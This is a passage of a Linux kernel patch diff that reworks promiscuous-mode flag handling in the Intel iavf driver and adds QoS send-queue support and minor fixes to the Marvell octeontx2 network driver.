+ 
+ 	i40e_cloud_filter_exit(pf);
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 06cfd567866c2..7389855fa307a 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -298,8 +298,6 @@ struct iavf_adapter {
+ #define IAVF_FLAG_CLIENT_NEEDS_OPEN		BIT(10)
+ #define IAVF_FLAG_CLIENT_NEEDS_CLOSE		BIT(11)
+ #define IAVF_FLAG_CLIENT_NEEDS_L2_PARAMS	BIT(12)
+-#define IAVF_FLAG_PROMISC_ON			BIT(13)
+-#define IAVF_FLAG_ALLMULTI_ON			BIT(14)
+ #define IAVF_FLAG_LEGACY_RX			BIT(15)
+ #define IAVF_FLAG_REINIT_ITR_NEEDED		BIT(16)
+ #define IAVF_FLAG_QUEUES_DISABLED		BIT(17)
+@@ -325,10 +323,7 @@ struct iavf_adapter {
+ #define IAVF_FLAG_AQ_SET_HENA			BIT_ULL(12)
+ #define IAVF_FLAG_AQ_SET_RSS_KEY		BIT_ULL(13)
+ #define IAVF_FLAG_AQ_SET_RSS_LUT		BIT_ULL(14)
+-#define IAVF_FLAG_AQ_REQUEST_PROMISC		BIT_ULL(15)
+-#define IAVF_FLAG_AQ_RELEASE_PROMISC		BIT_ULL(16)
+-#define IAVF_FLAG_AQ_REQUEST_ALLMULTI		BIT_ULL(17)
+-#define IAVF_FLAG_AQ_RELEASE_ALLMULTI		BIT_ULL(18)
++#define IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE	BIT_ULL(15)
+ #define IAVF_FLAG_AQ_ENABLE_VLAN_STRIPPING	BIT_ULL(19)
+ #define IAVF_FLAG_AQ_DISABLE_VLAN_STRIPPING	BIT_ULL(20)
+ #define IAVF_FLAG_AQ_ENABLE_CHANNELS		BIT_ULL(21)
+@@ -365,6 +360,12 @@ struct iavf_adapter {
+ 	(IAVF_EXTENDED_CAP_SEND_VLAN_V2 |		\
+ 	 IAVF_EXTENDED_CAP_RECV_VLAN_V2)
+ 
++	/* Lock to prevent possible clobbering of
++	 * current_netdev_promisc_flags
++	 */
++	spinlock_t current_netdev_promisc_flags_lock;
++	netdev_features_t current_netdev_promisc_flags;
++
+ 	/* OS defined structs */
+ 	struct net_device *netdev;
+ 	struct pci_dev *pdev;
+@@ -551,7 +552,8 @@ void iavf_add_ether_addrs(struct iavf_adapter *adapter);
+ void iavf_del_ether_addrs(struct iavf_adapter *adapter);
+ void iavf_add_vlans(struct iavf_adapter *adapter);
+ void iavf_del_vlans(struct iavf_adapter *adapter);
+-void iavf_set_promiscuous(struct iavf_adapter *adapter, int flags);
++void iavf_set_promiscuous(struct iavf_adapter *adapter);
++bool iavf_promiscuous_mode_changed(struct iavf_adapter *adapter);
+ void iavf_request_stats(struct iavf_adapter *adapter);
+ int iavf_request_reset(struct iavf_adapter *adapter);
+ void iavf_get_hena(struct iavf_adapter *adapter);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 326bb5fdf5f90..4836bac2bd09d 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -1198,6 +1198,16 @@ static int iavf_addr_unsync(struct net_device *netdev, const u8 *addr)
+ 	return 0;
+ }
+ 
++/**
++ * iavf_promiscuous_mode_changed - check if promiscuous mode bits changed
++ * @adapter: device specific adapter
++ */
++bool iavf_promiscuous_mode_changed(struct iavf_adapter *adapter)
++{
++	return (adapter->current_netdev_promisc_flags ^ adapter->netdev->flags) &
++		(IFF_PROMISC | IFF_ALLMULTI);
++}
++
+ /**
+  * iavf_set_rx_mode - NDO callback to set the netdev filters
+  * @netdev: network interface device structure
+@@ -1211,19 +1221,10 @@ static void iavf_set_rx_mode(struct net_device *netdev)
+ 	__dev_mc_sync(netdev, iavf_addr_sync, iavf_addr_unsync);
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
+-	if (netdev->flags & IFF_PROMISC &&
+-	    !(adapter->flags & IAVF_FLAG_PROMISC_ON))
+-		adapter->aq_required |= IAVF_FLAG_AQ_REQUEST_PROMISC;
+-	else if (!(netdev->flags & IFF_PROMISC) &&
+-		 adapter->flags & IAVF_FLAG_PROMISC_ON)
+-		adapter->aq_required |= IAVF_FLAG_AQ_RELEASE_PROMISC;
+-
+-	if (netdev->flags & IFF_ALLMULTI &&
+-	    !(adapter->flags & IAVF_FLAG_ALLMULTI_ON))
+-		adapter->aq_required |= IAVF_FLAG_AQ_REQUEST_ALLMULTI;
+-	else if (!(netdev->flags & IFF_ALLMULTI) &&
+-		 adapter->flags & IAVF_FLAG_ALLMULTI_ON)
+-		adapter->aq_required |= IAVF_FLAG_AQ_RELEASE_ALLMULTI;
++	spin_lock_bh(&adapter->current_netdev_promisc_flags_lock);
++	if (iavf_promiscuous_mode_changed(adapter))
++		adapter->aq_required |= IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE;
++	spin_unlock_bh(&adapter->current_netdev_promisc_flags_lock);
+ }
+ 
+ /**
+@@ -2174,19 +2175,8 @@ static int iavf_process_aq_command(struct iavf_adapter *adapter)
+ 		return 0;
+ 	}
+ 
+-	if (adapter->aq_required & IAVF_FLAG_AQ_REQUEST_PROMISC) {
+-		iavf_set_promiscuous(adapter, FLAG_VF_UNICAST_PROMISC |
+-				       FLAG_VF_MULTICAST_PROMISC);
+-		return 0;
+-	}
+-
+-	if (adapter->aq_required & IAVF_FLAG_AQ_REQUEST_ALLMULTI) {
+-		iavf_set_promiscuous(adapter, FLAG_VF_MULTICAST_PROMISC);
+-		return 0;
+-	}
+-	if ((adapter->aq_required & IAVF_FLAG_AQ_RELEASE_PROMISC) ||
+-	    (adapter->aq_required & IAVF_FLAG_AQ_RELEASE_ALLMULTI)) {
+-		iavf_set_promiscuous(adapter, 0);
++	if (adapter->aq_required & IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE) {
++		iavf_set_promiscuous(adapter);
+ 		return 0;
+ 	}
+ 
+@@ -5008,6 +4998,7 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	spin_lock_init(&adapter->cloud_filter_list_lock);
+ 	spin_lock_init(&adapter->fdir_fltr_lock);
+ 	spin_lock_init(&adapter->adv_rss_lock);
++	spin_lock_init(&adapter->current_netdev_promisc_flags_lock);
+ 
+ 	INIT_LIST_HEAD(&adapter->mac_filter_list);
+ 	INIT_LIST_HEAD(&adapter->vlan_filter_list);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 2fc8e60ef6afb..5a66b05c03222 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -948,14 +948,14 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ /**
+  * iavf_set_promiscuous
+  * @adapter: adapter structure
+- * @flags: bitmask to control unicast/multicast promiscuous.
+  *
+  * Request that the PF enable promiscuous mode for our VSI.
+  **/
+-void iavf_set_promiscuous(struct iavf_adapter *adapter, int flags)
++void iavf_set_promiscuous(struct iavf_adapter *adapter)
+ {
++	struct net_device *netdev = adapter->netdev;
+ 	struct virtchnl_promisc_info vpi;
+-	int promisc_all;
++	unsigned int flags;
+ 
+ 	if (adapter->current_op != VIRTCHNL_OP_UNKNOWN) {
+ 		/* bail because we already have a command pending */
+@@ -964,36 +964,57 @@ void iavf_set_promiscuous(struct iavf_adapter *adapter, int flags)
+ 		return;
+ 	}
+ 
+-	promisc_all = FLAG_VF_UNICAST_PROMISC |
+-		      FLAG_VF_MULTICAST_PROMISC;
+-	if ((flags & promisc_all) == promisc_all) {
+-		adapter->flags |= IAVF_FLAG_PROMISC_ON;
+-		adapter->aq_required &= ~IAVF_FLAG_AQ_REQUEST_PROMISC;
+-		dev_info(&adapter->pdev->dev, "Entering promiscuous mode\n");
+-	}
++	/* prevent changes to promiscuous flags */
++	spin_lock_bh(&adapter->current_netdev_promisc_flags_lock);
+ 
+-	if (flags & FLAG_VF_MULTICAST_PROMISC) {
+-		adapter->flags |= IAVF_FLAG_ALLMULTI_ON;
+-		adapter->aq_required &= ~IAVF_FLAG_AQ_REQUEST_ALLMULTI;
+-		dev_info(&adapter->pdev->dev, "%s is entering multicast promiscuous mode\n",
+-			 adapter->netdev->name);
++	/* sanity check to prevent duplicate AQ calls */
++	if (!iavf_promiscuous_mode_changed(adapter)) {
++		adapter->aq_required &= ~IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE;
++		dev_dbg(&adapter->pdev->dev, "No change in promiscuous mode\n");
++		/* allow changes to promiscuous flags */
++		spin_unlock_bh(&adapter->current_netdev_promisc_flags_lock);
++		return;
+ 	}
+ 
+-	if (!flags) {
+-		if (adapter->flags & IAVF_FLAG_PROMISC_ON) {
+-			adapter->flags &= ~IAVF_FLAG_PROMISC_ON;
+-			adapter->aq_required &= ~IAVF_FLAG_AQ_RELEASE_PROMISC;
+-			dev_info(&adapter->pdev->dev, "Leaving promiscuous mode\n");
+-		}
++	/* there are 2 bits, but only 3 states */
++	if (!(netdev->flags & IFF_PROMISC) &&
++	    netdev->flags & IFF_ALLMULTI) {
++		/* State 1  - only multicast promiscuous mode enabled
++		 * - !IFF_PROMISC && IFF_ALLMULTI
++		 */
++		flags = FLAG_VF_MULTICAST_PROMISC;
++		adapter->current_netdev_promisc_flags |= IFF_ALLMULTI;
++		adapter->current_netdev_promisc_flags &= ~IFF_PROMISC;
++		dev_info(&adapter->pdev->dev, "Entering multicast promiscuous mode\n");
++	} else if (!(netdev->flags & IFF_PROMISC) &&
++		   !(netdev->flags & IFF_ALLMULTI)) {
++		/* State 2 - unicast/multicast promiscuous mode disabled
++		 * - !IFF_PROMISC && !IFF_ALLMULTI
++		 */
++		flags = 0;
++		adapter->current_netdev_promisc_flags &=
++			~(IFF_PROMISC | IFF_ALLMULTI);
++		dev_info(&adapter->pdev->dev, "Leaving promiscuous mode\n");
++	} else {
++		/* State 3 - unicast/multicast promiscuous mode enabled
++		 * - IFF_PROMISC && IFF_ALLMULTI
++		 * - IFF_PROMISC && !IFF_ALLMULTI
++		 */
++		flags = FLAG_VF_UNICAST_PROMISC | FLAG_VF_MULTICAST_PROMISC;
++		adapter->current_netdev_promisc_flags |= IFF_PROMISC;
++		if (netdev->flags & IFF_ALLMULTI)
++			adapter->current_netdev_promisc_flags |= IFF_ALLMULTI;
++		else
++			adapter->current_netdev_promisc_flags &= ~IFF_ALLMULTI;
+ 
+-		if (adapter->flags & IAVF_FLAG_ALLMULTI_ON) {
+-			adapter->flags &= ~IAVF_FLAG_ALLMULTI_ON;
+-			adapter->aq_required &= ~IAVF_FLAG_AQ_RELEASE_ALLMULTI;
+-			dev_info(&adapter->pdev->dev, "%s is leaving multicast promiscuous mode\n",
+-				 adapter->netdev->name);
+-		}
++		dev_info(&adapter->pdev->dev, "Entering promiscuous mode\n");
+ 	}
+ 
++	adapter->aq_required &= ~IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE;
++
++	/* allow changes to promiscuous flags */
++	spin_unlock_bh(&adapter->current_netdev_promisc_flags_lock);
++
+ 	adapter->current_op = VIRTCHNL_OP_CONFIG_PROMISCUOUS_MODE;
+ 	vpi.vsi_id = adapter->vsi_res->vsi_id;
+ 	vpi.flags = flags;
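/*
 * Editorial aside: the iavf rework above collapses four request/release
 * flags into one "configure promiscuous mode" request plus a locked
 * snapshot of the netdev flags, and maps the two bits onto the three
 * reachable states. A hedged sketch of that mapping; IFF_* are the
 * standard netdev flags and FLAG_VF_* come from <linux/avf/virtchnl.h>:
 */
#include <linux/netdevice.h>

static unsigned int promisc_flags_demo(unsigned int netdev_flags)
{
	if (netdev_flags & IFF_PROMISC)		/* state 3: full promisc */
		return FLAG_VF_UNICAST_PROMISC | FLAG_VF_MULTICAST_PROMISC;
	if (netdev_flags & IFF_ALLMULTI)	/* state 1: multicast only */
		return FLAG_VF_MULTICAST_PROMISC;
	return 0;				/* state 2: both disabled */
}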
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index aadc352c2ffbd..5c9dc3f9262f5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -1222,6 +1222,11 @@ static int rvu_dbg_npa_ctx_display(struct seq_file *m, void *unused, int ctype)
+ 
+ 	for (aura = id; aura < max_id; aura++) {
+ 		aq_req.aura_id = aura;
++
++		/* Skip if queue is uninitialized */
++		if (ctype == NPA_AQ_CTYPE_POOL && !test_bit(aura, pfvf->pool_bmap))
++			continue;
++
+ 		seq_printf(m, "======%s : %d=======\n",
+ 			   (ctype == NPA_AQ_CTYPE_AURA) ? "AURA" : "POOL",
+ 			aq_req.aura_id);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/Makefile b/drivers/net/ethernet/marvell/octeontx2/nic/Makefile
+index 73fdb87986148..3d31ddf7c652e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/Makefile
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/Makefile
+@@ -8,7 +8,7 @@ obj-$(CONFIG_OCTEONTX2_VF) += rvu_nicvf.o otx2_ptp.o
+ 
+ rvu_nicpf-y := otx2_pf.o otx2_common.o otx2_txrx.o otx2_ethtool.o \
+                otx2_flows.o otx2_tc.o cn10k.o otx2_dmac_flt.o \
+-               otx2_devlink.o
++               otx2_devlink.o qos_sq.o
+ rvu_nicvf-y := otx2_vf.o otx2_devlink.o
+ 
+ rvu_nicpf-$(CONFIG_DCB) += otx2_dcbnl.o
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 011355e73696e..0f896f606c3e6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -513,8 +513,8 @@ void otx2_config_irq_coalescing(struct otx2_nic *pfvf, int qidx)
+ 		     (pfvf->hw.cq_ecount_wait - 1));
+ }
+ 
+-int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+-		      dma_addr_t *dma)
++static int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
++			     dma_addr_t *dma)
+ {
+ 	u8 *buf;
+ 
+@@ -532,8 +532,8 @@ int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+ 	return 0;
+ }
+ 
+-static int otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+-			   dma_addr_t *dma)
++int otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
++		    dma_addr_t *dma)
+ {
+ 	int ret;
+ 
+@@ -795,21 +795,21 @@ void otx2_txschq_stop(struct otx2_nic *pfvf)
+ void otx2_sqb_flush(struct otx2_nic *pfvf)
+ {
+ 	int qidx, sqe_tail, sqe_head;
++	struct otx2_snd_queue *sq;
+ 	u64 incr, *ptr, val;
+-	int timeout = 1000;
+ 
+ 	ptr = (u64 *)otx2_get_regaddr(pfvf, NIX_LF_SQ_OP_STATUS);
+-	for (qidx = 0; qidx < pfvf->hw.tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < otx2_get_total_tx_queues(pfvf); qidx++) {
++		sq = &pfvf->qset.sq[qidx];
++		if (!sq->sqb_ptrs)
++			continue;
++
+ 		incr = (u64)qidx << 32;
+-		while (timeout) {
+-			val = otx2_atomic64_add(incr, ptr);
+-			sqe_head = (val >> 20) & 0x3F;
+-			sqe_tail = (val >> 28) & 0x3F;
+-			if (sqe_head == sqe_tail)
+-				break;
+-			usleep_range(1, 3);
+-			timeout--;
+-		}
++		val = otx2_atomic64_add(incr, ptr);
++		sqe_head = (val >> 20) & 0x3F;
++		sqe_tail = (val >> 28) & 0x3F;
++		if (sqe_head != sqe_tail)
++			usleep_range(50, 60);
+ 	}
+ }
+ 
+@@ -899,7 +899,7 @@ int otx2_sq_aq_init(void *dev, u16 qidx, u16 sqb_aura)
+ 	return otx2_sync_mbox_msg(&pfvf->mbox);
+ }
+ 
+-static int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura)
++int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura)
+ {
+ 	struct otx2_qset *qset = &pfvf->qset;
+ 	struct otx2_snd_queue *sq;
+@@ -972,9 +972,17 @@ static int otx2_cq_init(struct otx2_nic *pfvf, u16 qidx)
+ 		cq->cint_idx = qidx - pfvf->hw.rx_queues;
+ 		cq->cqe_cnt = qset->sqe_cnt;
+ 	} else {
+-		cq->cq_type = CQ_XDP;
+-		cq->cint_idx = qidx - non_xdp_queues;
+-		cq->cqe_cnt = qset->sqe_cnt;
++		if (pfvf->hw.xdp_queues &&
++		    qidx < non_xdp_queues + pfvf->hw.xdp_queues) {
++			cq->cq_type = CQ_XDP;
++			cq->cint_idx = qidx - non_xdp_queues;
++			cq->cqe_cnt = qset->sqe_cnt;
++		} else {
++			cq->cq_type = CQ_QOS;
++			cq->cint_idx = qidx - non_xdp_queues -
++				       pfvf->hw.xdp_queues;
++			cq->cqe_cnt = qset->sqe_cnt;
++		}
+ 	}
+ 	cq->cqe_size = pfvf->qset.xqe_size;
+ 
+@@ -1085,7 +1093,7 @@ int otx2_config_nix_queues(struct otx2_nic *pfvf)
+ 	}
+ 
+ 	/* Initialize TX queues */
+-	for (qidx = 0; qidx < pfvf->hw.tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < pfvf->hw.non_qos_queues; qidx++) {
+ 		u16 sqb_aura = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+ 
+ 		err = otx2_sq_init(pfvf, qidx, sqb_aura);
+@@ -1132,7 +1140,7 @@ int otx2_config_nix(struct otx2_nic *pfvf)
+ 
+ 	/* Set RQ/SQ/CQ counts */
+ 	nixlf->rq_cnt = pfvf->hw.rx_queues;
+-	nixlf->sq_cnt = pfvf->hw.tot_tx_queues;
++	nixlf->sq_cnt = otx2_get_total_tx_queues(pfvf);
+ 	nixlf->cq_cnt = pfvf->qset.cq_cnt;
+ 	nixlf->rss_sz = MAX_RSS_INDIR_TBL_SIZE;
+ 	nixlf->rss_grps = MAX_RSS_GROUPS;
+@@ -1170,7 +1178,7 @@ void otx2_sq_free_sqbs(struct otx2_nic *pfvf)
+ 	int sqb, qidx;
+ 	u64 iova, pa;
+ 
+-	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < otx2_get_total_tx_queues(pfvf); qidx++) {
+ 		sq = &qset->sq[qidx];
+ 		if (!sq->sqb_ptrs)
+ 			continue;
+@@ -1238,8 +1246,8 @@ void otx2_aura_pool_free(struct otx2_nic *pfvf)
+ 	pfvf->qset.pool = NULL;
+ }
+ 
+-static int otx2_aura_init(struct otx2_nic *pfvf, int aura_id,
+-			  int pool_id, int numptrs)
++int otx2_aura_init(struct otx2_nic *pfvf, int aura_id,
++		   int pool_id, int numptrs)
+ {
+ 	struct npa_aq_enq_req *aq;
+ 	struct otx2_pool *pool;
+@@ -1315,8 +1323,8 @@ static int otx2_aura_init(struct otx2_nic *pfvf, int aura_id,
+ 	return 0;
+ }
+ 
+-static int otx2_pool_init(struct otx2_nic *pfvf, u16 pool_id,
+-			  int stack_pages, int numptrs, int buf_size)
++int otx2_pool_init(struct otx2_nic *pfvf, u16 pool_id,
++		   int stack_pages, int numptrs, int buf_size)
+ {
+ 	struct npa_aq_enq_req *aq;
+ 	struct otx2_pool *pool;
+@@ -1386,7 +1394,7 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 	stack_pages =
+ 		(num_sqbs + hw->stack_pg_ptrs - 1) / hw->stack_pg_ptrs;
+ 
+-	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < hw->non_qos_queues; qidx++) {
+ 		pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+ 		/* Initialize aura context */
+ 		err = otx2_aura_init(pfvf, pool_id, pool_id, num_sqbs);
+@@ -1406,7 +1414,7 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 		goto fail;
+ 
+ 	/* Allocate pointers and free them to aura/pool */
+-	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < hw->non_qos_queues; qidx++) {
+ 		pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+ 		pool = &pfvf->qset.pool[pool_id];
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 8a9793b06769f..efd66224b3dbf 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -27,6 +27,7 @@
+ #include "otx2_txrx.h"
+ #include "otx2_devlink.h"
+ #include <rvu_trace.h>
++#include "qos.h"
+ 
+ /* PCI device IDs */
+ #define PCI_DEVID_OCTEONTX2_RVU_PF              0xA063
+@@ -186,7 +187,8 @@ struct otx2_hw {
+ 	u16                     rx_queues;
+ 	u16                     tx_queues;
+ 	u16                     xdp_queues;
+-	u16                     tot_tx_queues;
++	u16			tc_tx_queues;
++	u16                     non_qos_queues; /* tx queues plus xdp queues */
+ 	u16			max_queues;
+ 	u16			pool_cnt;
+ 	u16			rqpool_cnt;
+@@ -498,6 +500,8 @@ struct otx2_nic {
+ 	u16			pfc_schq_list[NIX_TXSCH_LVL_CNT][MAX_TXSCHQ_PER_FUNC];
+ 	bool			pfc_alloc_status[NIX_PF_PFC_PRIO_MAX];
+ #endif
++	/* qos */
++	struct otx2_qos		qos;
+ 
+ 	/* napi event count. It is needed for adaptive irq coalescing. */
+ 	u32 napi_events;
+@@ -742,8 +746,7 @@ static inline void cn10k_aura_freeptr(void *dev, int aura, u64 buf)
+ /* Alloc pointer from pool/aura */
+ static inline u64 otx2_aura_allocptr(struct otx2_nic *pfvf, int aura)
+ {
+-	u64 *ptr = (u64 *)otx2_get_regaddr(pfvf,
+-			   NPA_LF_AURA_OP_ALLOCX(0));
++	u64 *ptr = (__force u64 *)otx2_get_regaddr(pfvf, NPA_LF_AURA_OP_ALLOCX(0));
+ 	u64 incr = (u64)aura | BIT_ULL(63);
+ 
+ 	return otx2_atomic64_add(incr, ptr);
+@@ -885,12 +888,23 @@ static inline void otx2_dma_unmap_page(struct otx2_nic *pfvf,
+ 
+ static inline u16 otx2_get_smq_idx(struct otx2_nic *pfvf, u16 qidx)
+ {
++	u16 smq;
+ #ifdef CONFIG_DCB
+ 	if (qidx < NIX_PF_PFC_PRIO_MAX && pfvf->pfc_alloc_status[qidx])
+ 		return pfvf->pfc_schq_list[NIX_TXSCH_LVL_SMQ][qidx];
+ #endif
++	/* check if qidx falls under QOS queues */
++	if (qidx >= pfvf->hw.non_qos_queues)
++		smq = pfvf->qos.qid_to_sqmap[qidx - pfvf->hw.non_qos_queues];
++	else
++		smq = pfvf->hw.txschq_list[NIX_TXSCH_LVL_SMQ][0];
+ 
+-	return pfvf->hw.txschq_list[NIX_TXSCH_LVL_SMQ][0];
++	return smq;
++}
++
++static inline u16 otx2_get_total_tx_queues(struct otx2_nic *pfvf)
++{
++	return pfvf->hw.non_qos_queues + pfvf->hw.tc_tx_queues;
+ }
+ 
+ /* MSI-X APIs */
+@@ -919,18 +933,24 @@ int otx2_txschq_config(struct otx2_nic *pfvf, int lvl, int prio, bool pfc_en);
+ int otx2_txsch_alloc(struct otx2_nic *pfvf);
+ void otx2_txschq_stop(struct otx2_nic *pfvf);
+ void otx2_txschq_free_one(struct otx2_nic *pfvf, u16 lvl, u16 schq);
++void otx2_free_pending_sqe(struct otx2_nic *pfvf);
+ void otx2_sqb_flush(struct otx2_nic *pfvf);
+-int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+-		      dma_addr_t *dma);
++int otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
++		    dma_addr_t *dma);
+ int otx2_rxtx_enable(struct otx2_nic *pfvf, bool enable);
+ void otx2_ctx_disable(struct mbox *mbox, int type, bool npa);
+ int otx2_nix_config_bp(struct otx2_nic *pfvf, bool enable);
+ void otx2_cleanup_rx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq);
+ void otx2_cleanup_tx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq);
++int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura);
+ int otx2_sq_aq_init(void *dev, u16 qidx, u16 sqb_aura);
+ int cn10k_sq_aq_init(void *dev, u16 qidx, u16 sqb_aura);
+ int otx2_alloc_buffer(struct otx2_nic *pfvf, struct otx2_cq_queue *cq,
+ 		      dma_addr_t *dma);
++int otx2_pool_init(struct otx2_nic *pfvf, u16 pool_id,
++		   int stack_pages, int numptrs, int buf_size);
++int otx2_aura_init(struct otx2_nic *pfvf, int aura_id,
++		   int pool_id, int numptrs);
+ 
+ /* RSS configuration APIs*/
+ int otx2_rss_init(struct otx2_nic *pfvf);
+@@ -1038,4 +1058,14 @@ static inline void cn10k_handle_mcs_event(struct otx2_nic *pfvf,
+ {}
+ #endif /* CONFIG_MACSEC */
+ 
++/* qos support */
++static inline void otx2_qos_init(struct otx2_nic *pfvf, int qos_txqs)
++{
++	struct otx2_hw *hw = &pfvf->hw;
++
++	hw->tc_tx_queues = qos_txqs;
++}
++
++u16 otx2_select_queue(struct net_device *netdev, struct sk_buff *skb,
++		      struct net_device *sb_dev);
+ #endif /* OTX2_COMMON_H */
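/*
 * Editorial aside: the otx2_common.h changes above split the TX queue
 * space into [0, non_qos_queues) for regular and XDP queues and
 * [non_qos_queues, non_qos_queues + tc_tx_queues) for the new QoS queues,
 * with otx2_get_smq_idx() translating a QoS qidx through qid_to_sqmap[].
 * A hedged sketch of that index translation outside the driver structs:
 */
static unsigned short smq_for_qidx_demo(unsigned short qidx,
					unsigned short non_qos_queues,
					const unsigned short *qid_to_sqmap,
					unsigned short default_smq)
{
	if (qidx >= non_qos_queues)	/* QoS send queue */
		return qid_to_sqmap[qidx - non_qos_queues];
	return default_smq;		/* regular / XDP send queue */
}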
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 17e546d0d7e55..c724131172f3f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -23,6 +23,7 @@
+ #include "otx2_struct.h"
+ #include "otx2_ptp.h"
+ #include "cn10k.h"
++#include "qos.h"
+ #include <rvu_trace.h>
+ 
+ #define DRV_NAME	"rvu_nicpf"
+@@ -1194,36 +1195,38 @@ static char *nix_mnqerr_e_str[NIX_MNQERR_MAX] = {
+ };
+ 
+ static char *nix_snd_status_e_str[NIX_SND_STATUS_MAX] =  {
+-	"NIX_SND_STATUS_GOOD",
+-	"NIX_SND_STATUS_SQ_CTX_FAULT",
+-	"NIX_SND_STATUS_SQ_CTX_POISON",
+-	"NIX_SND_STATUS_SQB_FAULT",
+-	"NIX_SND_STATUS_SQB_POISON",
+-	"NIX_SND_STATUS_HDR_ERR",
+-	"NIX_SND_STATUS_EXT_ERR",
+-	"NIX_SND_STATUS_JUMP_FAULT",
+-	"NIX_SND_STATUS_JUMP_POISON",
+-	"NIX_SND_STATUS_CRC_ERR",
+-	"NIX_SND_STATUS_IMM_ERR",
+-	"NIX_SND_STATUS_SG_ERR",
+-	"NIX_SND_STATUS_MEM_ERR",
+-	"NIX_SND_STATUS_INVALID_SUBDC",
+-	"NIX_SND_STATUS_SUBDC_ORDER_ERR",
+-	"NIX_SND_STATUS_DATA_FAULT",
+-	"NIX_SND_STATUS_DATA_POISON",
+-	"NIX_SND_STATUS_NPC_DROP_ACTION",
+-	"NIX_SND_STATUS_LOCK_VIOL",
+-	"NIX_SND_STATUS_NPC_UCAST_CHAN_ERR",
+-	"NIX_SND_STATUS_NPC_MCAST_CHAN_ERR",
+-	"NIX_SND_STATUS_NPC_MCAST_ABORT",
+-	"NIX_SND_STATUS_NPC_VTAG_PTR_ERR",
+-	"NIX_SND_STATUS_NPC_VTAG_SIZE_ERR",
+-	"NIX_SND_STATUS_SEND_STATS_ERR",
++	[NIX_SND_STATUS_GOOD] = "NIX_SND_STATUS_GOOD",
++	[NIX_SND_STATUS_SQ_CTX_FAULT] = "NIX_SND_STATUS_SQ_CTX_FAULT",
++	[NIX_SND_STATUS_SQ_CTX_POISON] = "NIX_SND_STATUS_SQ_CTX_POISON",
++	[NIX_SND_STATUS_SQB_FAULT] = "NIX_SND_STATUS_SQB_FAULT",
++	[NIX_SND_STATUS_SQB_POISON] = "NIX_SND_STATUS_SQB_POISON",
++	[NIX_SND_STATUS_HDR_ERR] = "NIX_SND_STATUS_HDR_ERR",
++	[NIX_SND_STATUS_EXT_ERR] = "NIX_SND_STATUS_EXT_ERR",
++	[NIX_SND_STATUS_JUMP_FAULT] = "NIX_SND_STATUS_JUMP_FAULT",
++	[NIX_SND_STATUS_JUMP_POISON] = "NIX_SND_STATUS_JUMP_POISON",
